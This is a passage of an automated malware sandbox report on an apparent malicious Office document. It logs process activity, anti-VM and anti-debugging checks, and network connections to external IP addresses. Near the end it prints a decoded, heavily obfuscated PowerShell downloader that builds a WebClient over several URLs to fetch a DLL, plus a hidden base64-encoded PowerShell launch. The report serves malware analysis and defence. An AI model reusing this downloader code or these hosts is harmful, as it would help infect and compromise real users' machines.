Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_7-16664

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376

Thread sleep time: -922337203685477s >= -30000s

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 20_2_002075F0 FindFirstFileW,

20_2_002075F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior

Source: rundll32.exe, 00000008.00000002.2142890318.000000000086D000.00000004.00000020.sdmp	Binary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: powershell.exe, 00000005.00000002.2137911907.00000000002C7000.00000004.00000020.sdmp	Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Source: C:\Windows\SysWOW64\rundll32.exe

API call chain: ExitProcess graph end node

graph_7-16665

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_100031D0 RunDLL,LoadLibraryA,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWindow,ShowWind

7_2_100031D0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10015D3F EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

7_2_10015D3F

Source: C:\Windows\SysWOW64\rundll32.exe

7_2_10015D3F

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_001B6AB2 mov eax, dword ptr fs:[00000030h]	7_2_001B6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_001D76B2 mov eax, dword ptr fs:[00000030h]	9_2_001D76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 10_2_001F6AB2 mov eax, dword ptr fs:[00000030h]	10_2_001F6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_00306AB2 mov eax, dword ptr fs:[00000030h]	11_2_00306AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_004B76B2 mov eax, dword ptr fs:[00000030h]	12_2_004B76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 13_2_001C6AB2 mov eax, dword ptr fs:[00000030h]	13_2_001C6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_001D76B2 mov eax, dword ptr fs:[00000030h]	14_2_001D76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_001A6AB2 mov eax, dword ptr fs:[00000030h]	15_2_001A6AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_2_001E76B2 mov eax, dword ptr fs:[00000030h]	17_2_001E76B2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 18_2_00206AB2 mov eax, dword ptr fs:[00000030h]	18_2_00206AB2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 20_2_002076B2 mov eax, dword ptr fs:[00000030h]	20_2_002076B2

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_10005930 SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError,

7_2_10005930

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000BCEA SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_1000BCEA

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 202.187.222.40 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 184.66.18.83 80
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 167.71.148.58 187

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded $ioxKy2 = [tYPE]("{2}{0}{3}{1}"-f'sTEm.iO.diRecT','y','Sy','Or') ; sEt-IteM vaRiabLe:16VJ ([tYPe]("{6}{7}{3}{5}{0}{2}{4}{1}" -F'V','r','IcEPoiN','NeT.S','TmaNaGE','eR','sYS','tem.') );$Kt3sbog=('B'+('m'+'v'+'kk9r'));$Mj5npw_=$Z9ls4z6 + [char](64) + $G35w524;$Yd085rx=('Ux'+('ee'+'_')+'wl'); ( gEt-itEM ('vaRI'+'AblE'+':'+'IoXKY2') ).VAlue::"C`RE`AT`e`dIREctOrY"($HOME + ((('IE'+'c')+'O'+('_'+'wgq')+'v'+('7'+'IEcC031')+('6emIE'+'c')) -crEplAcE ('IE'+'c'),[cHAR]92));$Ml29469=('R'+('6j'+'kuve')); ( VARiAbLe 16vj -vALUEon )::"sEC`Urityp`RoTo`coL" = ('Tl'+('s1'+'2'));$Nimh_ux=('He'+'z'+('fu'+'29'));$Mem0uwr = ('Ly'+('et'+'a6')+'ud');$Fj_inxi=(('Vv'+'3')+('jeg'+'8'));$Gyzf4g8=(('Q5'+'7qw')+'k'+'z');$C0w7ro6=$HOME+(('{0}O_wgqv'+'7'+'{0'+'}'+'C'+'0316em{0}') -f [ChAr]92)+$Mem0uwr+(('.d'+'l')+'l');$Gb3lyk8=(('Mx'+'1g')+('g'+'om'));$Rp56zra=NEW`-Ob`JeCt NeT.WEbCLiEnt;$Cj5kwnm=(((('http:qq)'+'(s2'+')(qq'+')'))+'('+(('s2'+')(zen'+'i'))+('thc'+'ampu'+'s.c')+(('o'+'mqq)(s2'+')'+'(lq'+'q)'))+(('(s'))+'2'+((')'+'(yQ'+'qq)('))+(('s'+'2)'))+('(@htt'+'p'+':q'+'q'+')(s2)')+(('(q'))+(('q'+')(s2)'))+(('(h'+'b'))+('privile'+'g')+('e'+'d.')+(('co'+'mqq)(s2)'+'(cg'+'i-bin'+'q'))+(('q)('+'s2)'))+(('(kcg'+'gFqq'))+((')'+'(s2)'))+('(@htt'+'p'+':'+'qq)')+'('+(('s2)('+'q'))+(('q)('+'s2)('+'l'+'oc'))+'al'+'af'+('fo'+'rdab'+'l'+'er')+('oof'+'e')+'r.'+'co'+(('mq'+'q)(s2'+')'))+'('+('r'+'al')+'ph'+'s-'+'r'+('e'+'ce')+(('ipt-f2uh'+'fqq'+')('))+'s2'+((')'+'(q'))+'T'+('T'+'5DC')+'qq'+')'+(('(s'+'2'
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded $ioxKy2 = [tYPE]("{2}{0}{3}{1}"-f'sTEm.iO.diRecT','y','Sy','Or') ; sEt-IteM vaRiabLe:16VJ ([tYPe]("{6}{7}{3}{5}{0}{2}{4}{1}" -F'V','r','IcEPoiN','NeT.S','TmaNaGE','eR','sYS','tem.') );$Kt3sbog=('B'+('m'+'v'+'kk9r'));$Mj5npw_=$Z9ls4z6 + [char](64) + $G35w524;$Yd085rx=('Ux'+('ee'+'_')+'wl'); ( gEt-itEM ('vaRI'+'AblE'+':'+'IoXKY2') ).VAlue::"C`RE`AT`e`dIREctOrY"($HOME + ((('IE'+'c')+'O'+('_'+'wgq')+'v'+('7'+'IEcC031')+('6emIE'+'c')) -crEplAcE ('IE'+'c'),[cHAR]92));$Ml29469=('R'+('6j'+'kuve')); ( VARiAbLe 16vj -vALUEon )::"sEC`Urityp`RoTo`coL" = ('Tl'+('s1'+'2'));$Nimh_ux=('He'+'z'+('fu'+'29'));$Mem0uwr = ('Ly'+('et'+'a6')+'ud');$Fj_inxi=(('Vv'+'3')+('jeg'+'8'));$Gyzf4g8=(('Q5'+'7qw')+'k'+'z');$C0w7ro6=$HOME+(('{0}O_wgqv'+'7'+'{0'+'}'+'C'+'0316em{0}') -f [ChAr]92)+$Mem0uwr+(('.d'+'l')+'l');$Gb3lyk8=(('Mx'+'1g')+('g'+'om'));$Rp56zra=NEW`-Ob`JeCt NeT.WEbCLiEnt;$Cj5kwnm=(((('http:qq)'+'(s2'+')(qq'+')'))+'('+(('s2'+')(zen'+'i'))+('thc'+'ampu'+'s.c')+(('o'+'mqq)(s2'+')'+'(lq'+'q)'))+(('(s'))+'2'+((')'+'(yQ'+'qq)('))+(('s'+'2)'))+('(@htt'+'p'+':q'+'q'+')(s2)')+(('(q'))+(('q'+')(s2)'))+(('(h'+'b'))+('privile'+'g')+('e'+'d.')+(('co'+'mqq)(s2)'+'(cg'+'i-bin'+'q'))+(('q)('+'s2)'))+(('(kcg'+'gFqq'))+((')'+'(s2)'))+('(@htt'+'p'+':'+'qq)')+'('+(('s2)('+'q'))+(('q)('+'s2)('+'l'+'oc'))+'al'+'af'+('fo'+'rdab'+'l'+'er')+('oof'+'e')+'r.'+'co'+(('mq'+'q)(s2'+')'))+'('+('r'+'al')+'ph'+'s-'+'r'+('e'+'ce')+(('ipt-f2uh'+'fqq'+')('))+'s2'+((')'+'(q'))+'T'+('T'+'5DC')+'qq'+')'+(('(s'+'2'			Jump to behavior

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAgACQAaQBvAHgASwB5ADIAIAA9ACAAWwB0AFkAUABFAF0AKAAiAHsAMgB9AHsAMAB9AHsAMwB9AHsAMQB9ACIALQBmACcAcwBUAEUAbQAuAGkATwAuAGQAaQBSAGUAYwBUACcALAAnAHkAJwAsACcAUwB5ACcALAAnAE8AcgAnACkAIAA7ACAAcwBFAHQALQBJAHQAZQBNACAAIAB2AGEAUgBpAGEAYgBMAGUAOgAxADYAVgBKACAAIAAoAFsAdABZAFAAZQBdACgAIgB7ADYAfQB7ADcAfQB7ADMAfQB7ADUAfQB7ADAAfQB7ADIAfQB7ADQAfQB7ADEAfQAiACAALQBGACcAVgAnACwAJwByACcALAAnAEkAYwBFAFAAbwBpAE4AJwAsACcATgBlAFQALgBTACcALAAnAFQAbQBhAE4AYQBHAEUAJwAsACcAZQBSACcALAAnAHMAWQBTACcALAAnAHQAZQBtAC4AJwApACAAKQA7ACQASwB0ADMAcwBiAG8AZwA9ACgAJwBCACcAKwAoACcAbQAnACsAJwB2ACcAKwAnAGsAawA5AHIAJwApACkAOwAkAE0AagA1AG4AcAB3AF8APQAkAFoAOQBsAHMANAB6ADYAIAArACAAWwBjAGgAYQByAF0AKAA2ADQAKQAgACsAIAAkAEcAMwA1AHcANQAyADQAOwAkAFkAZAAwADgANQByAHgAPQAoACcAVQB4ACcAKwAoACcAZQBlACcAKwAnAF8AJwApACsAJwB3AGwAJwApADsAIAAgACgAIAAgAGcARQB0AC0AaQB0AEUATQAgACgAJwB2AGEAUgBJACcAKwAnAEEAYgBsAEUAJwArACcAOgAnACsAJwBJAG8AWABLAFkAMgAnACkAIAApAC4AVgBBAGwAdQBlADoAOgAiAEMAYABSAEUAYABBAFQAYABlAGAAZABJAFIARQBjAHQATwByAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEkARQAnACsAJwBjACcAKQArACcATwAnACsAKAAnAF8AJwArACcAdwBnAHEAJwApACsAJwB2ACcAKwAoACcANwAnACsAJwBJAEUAYwBDADAAMwAxACcAKQArACgAJwA2AGUAbQBJAEUAJwArACcAYwAnACkAKQAgAC0AYwByAEUAcABsAEEAYwBFACAAIAAoACcASQBFACcAKw